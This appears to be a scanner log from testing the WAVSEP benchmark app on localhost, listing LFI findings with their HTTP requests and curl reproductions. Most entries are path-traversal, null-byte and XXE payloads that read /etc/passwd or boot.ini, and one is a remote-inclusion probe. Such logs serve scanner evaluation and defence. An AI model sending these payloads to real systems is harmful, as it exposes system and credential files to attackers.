curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

